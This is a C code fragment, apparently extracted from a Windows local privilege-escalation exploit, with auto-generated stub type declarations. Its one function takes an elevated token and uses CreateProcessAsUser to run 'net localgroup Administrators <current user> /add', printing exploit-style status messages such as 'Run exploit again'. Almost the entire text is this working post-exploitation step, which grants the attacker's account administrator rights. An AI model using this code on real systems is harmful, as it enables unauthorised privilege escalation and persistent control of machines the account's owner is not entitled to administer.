
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_1__ ;


typedef int currentuser ;
struct TYPE_6__ {int cb; } ;
typedef TYPE_1__ STARTUPINFO ;
typedef TYPE_1__ PROCESS_INFORMATION ;
typedef int HANDLE ;
typedef int DWORD ;


 int CREATE_NEW_CONSOLE ;
 int CreateProcessAsUser (int ,int *,char*,int *,int *,int ,int ,int *,int *,TYPE_1__*,TYPE_1__*) ;
 int FALSE ;
 int GetLastError () ;
 int GetUserName (char*,int*) ;
 int MAX_PATH ;
 int ZeroMemory (TYPE_1__*,int) ;
 int printf (char*,...) ;
 int sprintf (char*,char*,char*) ;

int AddAccountToAdminGroup(HANDLE hTokenElevated)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    DWORD currentusersize;
    char currentuser[100];
    char netcommand[MAX_PATH];


    ZeroMemory(&si, sizeof(STARTUPINFO));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
    si.cb = sizeof(STARTUPINFO);

    currentusersize = sizeof(currentuser);

    if (!GetUserName(currentuser, &currentusersize))
    {
        printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
        return -1;
    }

    printf("\n[*] Adding current user '%s' account to the local administrators group", currentuser);

    sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);

    if (!CreateProcessAsUser(hTokenElevated, ((void*)0), netcommand, ((void*)0), ((void*)0), FALSE, CREATE_NEW_CONSOLE, ((void*)0), ((void*)0), &si, &pi))
    {
        printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
        return -1;
    }
    printf("\n[+] Executed command successfully\n");

    return 0;
}
